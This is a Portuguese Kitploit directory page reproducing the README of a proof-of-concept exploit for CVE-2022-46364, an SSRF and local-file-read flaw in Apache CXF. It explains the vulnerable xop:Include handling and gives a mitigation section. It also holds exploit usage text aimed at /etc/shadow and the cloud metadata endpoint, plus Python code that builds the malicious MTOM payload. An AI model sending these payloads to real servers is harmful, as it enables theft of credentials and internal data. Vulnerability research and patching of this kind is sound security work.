Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-46364-Proof-of-the-concept — Esta vulnerabilidade permite que um atacante realize ataques de SSRF (Server-Side Request Forgery) em webservices Apache CXF que aceitam solicitações MTOM/XOP. O problema existe na forma como o atributo href de xop:Include é analisado, permitindo que URLs arbitrárias sejam solicitadas pelo servidor. | Kitploit
Ferramentas/GitHubGitHub/cybermaksx/cve-2022-46364-proof-of-the-concept
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubcybermaksx/cve-2022-46364-proof-of-the-concept

CVE-2022-46364-Proof-of-the-concept

Ver Repositório
2há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Esta vulnerabilidade permite que um atacante realize ataques de SSRF (Server-Side Request Forgery) em webservices Apache CXF que aceitam solicitações MTOM/XOP. O problema existe na forma como o atributo href de xop:Include é analisado, permitindo que URLs arbitrárias sejam solicitadas pelo servidor.

Compartilhar

CVE-2022-46364: Exploração de SSRF para LFI no Apache CXF MTOM XOP:Include

⚠️ AVISO LEGAL

ESTA FERRAMENTA É APENAS PARA FINS EDUCACIONAIS E TESTES DE SEGURANÇA AUTORIZADOS

Este exploit de prova de conceito é fornecido para fins educacionais, a fim de ajudar profissionais de segurança a compreender a vulnerabilidade e proteger seus sistemas. O acesso não autorizado a sistemas de computador é ilegal. O autor não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado por esta ferramenta. Você deve obter permissão explícita por escrito do proprietário do sistema antes de testar. Ao usar esta ferramenta, você concorda em cumprir todas as leis aplicáveis.


📋 ÍNDICE

  1. Visão Geral
  2. Detalhes da Vulnerabilidade
  3. Análise Técnica Detalhada
  4. Uso do Exploit
  5. Instalação e Requisitos 6 Mitigação
  6. Referências e Créditos

📌 VISÃO GERAL

AtributoValor
CVE IDCVE-2022-46364
GHSA IDGHSA-x3x3-qwjq-8gj4
Tipo de VulnerabilidadeFalsificação de Solicitação do Lado do Servidor (SSRF) → Inclusão de Arquivo Local (LFI)
Software AfetadoApache CXF < 3.5.5, Apache CXF < 3.4.10
SeveridadeCrítica
Pontuação CVSS9.8 (Crítica)
Vetor de AtaqueRede
AutenticaçãoNenhuma necessária
Versões CorrigidasApache CXF 3.5.5+, 3.4.10+

Este exploit aproveita uma vulnerabilidade crítica de SSRF na implementação MTOM (Message Transmission Optimization Mechanism) do Apache CXF para alcançar Inclusão de Arquivo Local (LFI) e capacidades de varredura de rede interna.


🔬 DETALHES DA VULNERABILIDADE

O Problema Central

O Apache CXF valida incorretamente o atributo href dentro de elementos xop:Include ao processar mensagens SOAP codificadas com MTOM. A biblioteca usa URLConnection do Java para desreferenciar a URI sem restrições de protocolo adequadas, permitindo que atacantes especifiquem:

  • file:// - Ler arquivos locais (LFI)
  • http:// / https:// - Solicitações de rede interna (SSRF)
  • ftp:// - Solicitações FTP (potencial para exploração adicional)

Por Que Isso é Importante

Esta vulnerabilidade é particularmente perigosa porque:

  1. Nenhuma autenticação necessária - Atacantes podem atingir qualquer endpoint SOAP acessível
  2. Nenhum privilégio especial necessário - O servidor executa solicitações com seus próprios privilégios
  3. Divulgação de informações - Pode expor metadados de nuvem (AWS, GCP, Azure), arquivos de configuração e código-fonte
  4. Pivoteamento de rede - O servidor vulnerável torna-se um proxy para reconhecimento de rede interna

Configurações Afetadas

Qualquer implantação do Apache CXF que:

  • Aceite mensagens SOAP codificadas com MTOM
  • Tenha pelo menos um método de serviço web com um parâmetro (qualquer tipo)
  • Use versões anteriores a 3.5.5 (ramo principal) ou 3.4.10 (ramo legado)

🧠 ANÁLISE TÉCNICA DETALHADA

Contexto do Protocolo: MTOM e XOP

MTOM (Message Transmission Optimization Mechanism) é um padrão W3C para otimizar a transmissão de dados binários em mensagens SOAP. Ele usa XOP (XML-binary Optimized Packaging) para incluir referências a dados binários:

root@kitploit:~
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <myData>
            <xop:Include href="cid:[email protected]" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </myData>
    </soap:Body>
</soap:Envelope>

Normalmente, href contém uma referência CID (Content-ID) a uma parte MIME. No entanto, a classe AttachmentUtil do Apache CXF processa valores href como URIs genéricas sem sanitização adequada.

O Caminho do Código Vulnerável

  1. Análise da Solicitação:

    • O CXF recebe uma solicitação HTTP multipart/related com Content-Type: application/xop+xml
    • AttachmentUtil.getAttachmentObject() processa elementos xop:Include
  2. Desreferenciação de URI:

    • O método vulnerável chama new URL(href).openStream() diretamente
    • Não há bloqueio do protocolo file://
    • Nenhuma restrição de rede (por exemplo, nenhuma validação contra faixas IP internas)
  3. Incorporação da Resposta:

    • O conteúdo obtido é codificado em Base64 e incorporado na resposta SOAP
    • O atacante recebe os dados no envelope SOAP

Trecho de Código (Padrão Vulnerável)

root@kitploit:~
// Representação simplificada do código vulnerável no CXF < 3.5.5
public DataHandler getAttachmentObject(String href) {
    URL url = new URL(href);  // Nenhuma validação de protocolo!
    return new DataHandler(url.openStream());
}

Por Que o LFI Funciona

O protocolo file:// segue o mesmo caminho de código:

  • file:///etc/passwd → Java abre /etc/passwd como um fluxo de arquivo
  • O conteúdo do arquivo é retornado como anexo
  • Não há restrições de sistema de arquivos além das permissões do usuário do processo CXF

Capacidade de Varredura de Rede

Ao iterar por IPs e portas, atacantes podem:

  • Descobrir serviços internos
  • Acessar endpoints de metadados em nuvem (169.254.169.254)
  • Contornar controles de segmentação de rede

🛠️ USO DO EXPLOIT

Sintaxe do Comando

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-e ENDPOINT] [-u URL] [-f FILE] [-s SCAN]

CVE-2022-46364 Apache CXF SSRF to LFI Exploit - Educational Purpose Only

options:
  -h, --help            Show this help message and exit
  -t TARGET, --target TARGET
                        Target base URL (e.g., http://192.168.1.100:8080)
  -e ENDPOINT, --endpoint ENDPOINT
                        Web service endpoint path (default: /services/Service)
  -u URL, --url URL     External URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)
  -f FILE, --file FILE  Local file path for LFI (e.g., /etc/passwd, C:\\Windows\\win.ini)
  -s SCAN, --scan SCAN  Scan internal network range in CIDR notation (e.g., 192.168.1.0/24)

Explicação dos Argumentos

ArgumentoDescriçãoExemplo
-t, --targetObrigatório. URL base do serviço Apache CXF alvohttp://10.10.10.50:8080
-e, --endpointOpcional. Caminho do endpoint SOAP/services/UserManagement
-u, --urlURL HTTP/HTTPS para buscar via SSRFhttp://169.254.169.254/latest/user-data
-f, --fileCaminho de arquivo local para ler via LFI/etc/shadow, C:\ProgramData\secret.txt

📦 INSTALAÇÃO E REQUISITOS

Pré-requisitos

root@kitploit:~
# Python 3.6 ou superior necessário
python --version

Passos de Instalação

root@kitploit:~
# Clone o repositório
git clone https://github.com/cybermaksxx/CVE-2022-46364-Proof-of-the-concept
cd CVE-2022-46364-PoC

### requisitos

requests>=2.28.0 urllib3>=1.26.0

root@kitploit:~

---



### Detalhes da Implementação Principal

#### 1. Construção do Payload MTOM
```python
def create_mtom_payload(uri):
    """Create a multipart/related MTOM message with xop:Include"""
    soap_part = f"""--MIME_BOUNDARY
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: binary

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <vulnerableParam>
            <xop:Include href="{uri}" 
                        xmlns:xop="http://www.w3.org/2004/08/xop/include"/>
        </vulnerableParam>
    </soap:Body>
</soap:Envelope>
--MIME_BOUNDARY--"""
    return soap_part

🛡️ MITIGAÇÃO

Correção Oficial

Atualize para uma versão corrigida:

root@kitploit:~
<!-- Para projetos Maven -->
<dependency>
    <groupId>org.apache.cxf</groupId>
    <artifactId>cxf-rt-frontend-jaxws</artifactId>
    <version>3.5.5</version> <!-- ou 3.4.10 para legado -->
</dependency>

Soluções Alternativas (Se a Correção Não For Possível)

  1. Desabilitar MTOM completamente (se não for necessário):

    root@kitploit:~
    <jaxws:endpoint ...>
        <jaxws:properties>
            <entry key="mtom-enabled" value="false"/>
        </jaxws:properties>
    </jaxws:endpoint>
    
  2. Controles em nível de rede:

    • Restringir conexões de saída do servidor de aplicação CXF
    • Usar firewalls para impedir acesso a faixas IP internas a partir da camada de aplicação
    • Implementar filtragem de saída
  3. Regras de Firewall de Aplicação Web (WAF):

    • Bloquear solicitações contendo xop:Include com href apontando para file:// ou endereços IP internos

📚 REFERÊNCIAS E CRÉDITOS

Pesquisadores Originais

Esta vulnerabilidade foi descoberta e divulgada de forma responsável por:

  • Jonathan Leitschuh - Security Researcher
  • Nick Tait - Security Researcher

Avisos Oficiais

  • Apache CXF Security Advisory
  • GitHub Advisory Database: GHSA-x3x3-qwjq-8gj4
  • NVD: CVE-2022-46364

Recursos Relacionados

  • MTOM Specification (W3C)
  • XOP Specification (W3C)
  • Apache CXF Documentation

Agradecimentos

  • Equipe do Apache CXF pela rápida resposta e correção
  • GitHub Security Lab por publicar o aviso
  • Comunidade de segurança por práticas de divulgação responsável

📄 LICENÇA

Esta ferramenta é fornecida apenas para fins educacionais. O uso não autorizado é proibido.

root@kitploit:~
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

Última Atualização: Março de 2026
Versão: 1.0
Contato: Para preocupações ou perguntas de segurança, por favor abra uma issue no GitHub.


Este documento faz parte de uma pesquisa de segurança responsável. Sempre obtenha autorização adequada antes de testar.

Baixar ferramenta